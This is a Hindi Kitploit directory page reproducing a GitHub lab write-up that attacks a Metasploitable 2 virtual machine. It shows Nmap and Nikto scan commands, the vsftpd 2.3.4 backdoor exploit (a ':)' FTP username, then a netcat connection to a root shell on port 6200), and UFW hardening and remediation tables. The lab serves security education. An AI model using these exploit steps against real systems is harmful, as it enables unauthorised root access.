Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
network-security-lab — नियंत्रित वर्चुअल आक्रमण एवं रक्षा प्रयोगशाला — CVE-2011-2523 शोषण, Nmap पुनर्ज्ञान, Nikto स्कैनिंग, Metasploitable 2 पर UFW सख्तीकरण | Kitploit
उपकरण/GitHubGitHub/amirmuhammadmarvi/network-security-lab
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणकॉन्फ़िगरेशन ऑडिटिंगवेब सुरक्षानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लैब और अभ्यास
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

नियंत्रित वर्चुअल आक्रमण एवं रक्षा प्रयोगशाला — CVE-2011-2523 शोषण, Nmap पुनर्ज्ञान, Nikto स्कैनिंग, Metasploitable 2 पर UFW सख्तीकरण

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

🔬 नेटवर्क सुरक्षा प्रयोगशाला

एक नियंत्रित आभासी वातावरण जो वास्तविक दुनिया के हमले और बचाव परिदृश्यों का अनुकरण करता है

Python Platform CVE Status


📋 अवलोकन

यह प्रयोगशाला एक पूरी तरह से पृथक आभासी वातावरण में एक वास्तविक दुनिया के पैठ परीक्षण और रक्षात्मक कठोरीकरण अभ्यास का अनुकरण करती है। यह आक्रामक सुरक्षा जीवनचक्र को प्रदर्शित करती है — खोज से लेकर शोषण तक — और रक्षात्मक नियंत्रण जो प्रत्येक जोखिम को कम करेगा।

मुख्य परिणाम: बिना किसी क्रेडेंशियल या विशेष उपकरणों के, एक ज्ञात बैकडोर का शोषण करके 60 सेकंड से कम समय में लक्ष्य मशीन पर पूर्ण रूट पहुंच प्राप्त की।


🏗 प्रयोगशाला वातावरण

घटकविवरण
हाइपरवाइजरVMware Workstation
नेटवर्कहोस्ट-ओनली / NAT (पूरी तरह पृथक)
हमलावर ओएसUbuntu 24 LTS
लक्ष्य ओएसMetasploitable 2 (Linux 2.6.x)
हमलावर आईपी192.168.148.255
लक्ष्य आईपी192.168.148.130

🎯 कार्यप्रणाली

root@kitploit:~
Reconnaissance  →  Scanning  →  Exploitation  →  Defense & Hardening

🔍 चरण 1 — टोही

Nmap के साथ पोर्ट स्कैनिंग

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

मुख्य निष्कर्ष — कुल 23 खुले पोर्ट:

Nikto के साथ वेब स्कैनिंग

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18 कमजोरियाँ पाई गईं, जिनमें शामिल हैं:

  • phpMyAdmin सार्वजनिक रूप से उजागर
  • phpinfo.php पूर्ण सर्वर कॉन्फ़िगरेशन लीक कर रहा है
  • HTTP TRACE सक्षम (XST हमले)
  • /doc/, /test/ पर निर्देशिका अनुक्रमण सक्षम
  • पुराना Apache 2.2.8 और PHP 5.2.4

💥 चरण 2 — शोषण

CVE-2011-2523 — vsftpd 2.3.4 बैकडोर

vsftpd 2.3.4 में आपूर्ति श्रृंखला समझौते के माध्यम से पेश किया गया एक बैकडोर है। :) में समाप्त होने वाले उपयोगकर्ता नाम को भेजने से सर्वर पोर्ट 6200 पर एक रूट शेल खोलता है।

root@kitploit:~
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200

# Step 3 — Verify access
whoami
# → root

परिणाम: < 60 सेकंड में पूर्ण रूट-स्तरीय सिस्टम पहुंच प्राप्त हुई — कोई क्रेडेंशियल, कोई शोषण ढांचा आवश्यक नहीं।

प्रभाव: रूट पहुंच वाला हमलावर किसी भी फ़ाइल को पढ़/संशोधित/हटा सकता है, मैलवेयर स्थापित कर सकता है, डेटा बाहर निकाल सकता है, या नेटवर्क पर अन्य होस्ट पर पैंतरेबाज़ी कर सकता है।


🛡 चरण 3 — बचाव और कठोरीकरण

UFW फ़ायरवॉल — डिफ़ॉल्ट अस्वीकार नीति

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH only
sudo ufw status verbose

अनुशंसित उपचार


📄 पूरी रिपोर्ट

पूर्ण मूल्यांकन के लिए report.md देखें — पूर्ण कार्यप्रणाली, कमांड आउटपुट, निष्कर्ष तालिका, शोषण चरण, और सभी उपचार अनुशंसाएँ।


⚠️ कानूनी अस्वीकरण

यह प्रयोगशाला जानबूझकर कमजोर सॉफ्टवेयर (Metasploitable 2) का उपयोग करके पूरी तरह से पृथक आभासी वातावरण में संचालित की गई थी। सभी तकनीकें केवल शैक्षिक और पोर्टफोलियो उद्देश्यों के लिए हैं। उन सिस्टमों पर दोहराएं नहीं जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।


🛠 उपयोग किए गए उपकरण


लेखक: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

टूल डाउनलोड करें
पोर्टसेवासंस्करणजोखिम
21FTPvsftpd 2.3.4🔴 गंभीर — ज्ञात बैकडोर (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 मध्यम — पुराना
23TelnetLinux telnetd🟠 उच्च — सादा पाठ प्रोटोकॉल
80HTTPApache 2.2.8🟠 उच्च — एकाधिक CVE
1524Bindshellरूट शेल🔴 गंभीर — खुला रूट शेल
3306MySQL5.0.51a🟠 उच्च — डेटाबेस उजागर
5900VNCProtocol 3.3🟠 उच्च — कमजोर प्रमाणीकरण
6667IRCUnrealIRCd🔴 गंभीर — ज्ञात बैकडोर
कमजोरीसमाधान
vsftpd 2.3.4 बैकडोरvsftpd 3.x में अपग्रेड करें या SFTP पर माइग्रेट करें
खुला रूट शेल (पोर्ट 1524)तुरंत अक्षम करें, स्थापना का ऑडिट करें
Telnet (पोर्ट 23)अक्षम करें — केवल SSH लागू करें
phpMyAdmin उजागरIP द्वारा प्रतिबंधित करें, मजबूत प्रमाणीकरण आवश्यक है
MySQL उजागर (पोर्ट 3306)localhost से बाइंड करें, बाहरी पहुंच को अवरुद्ध करें
VNC उजागर (पोर्ट 5900)IP द्वारा प्रतिबंधित करें या अक्षम करें
निर्देशिका अनुक्रमणApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
पुराना Apache + PHPसमर्थित LTS संस्करणों में अपग्रेड करें
उपकरणउद्देश्य
Nmapपोर्ट स्कैनिंग और सेवा का पता लगाना
Niktoवेब कमजोरी स्कैनिंग
Netcatबैकडोर शेल से कनेक्ट करना
UFWहोस्ट-आधारित फ़ायरवॉल कॉन्फ़िगरेशन
FTP क्लाइंटvsftpd बैकडोर को ट्रिगर करना
VMware Workstationप्रयोगशाला वर्चुअलाइजेशन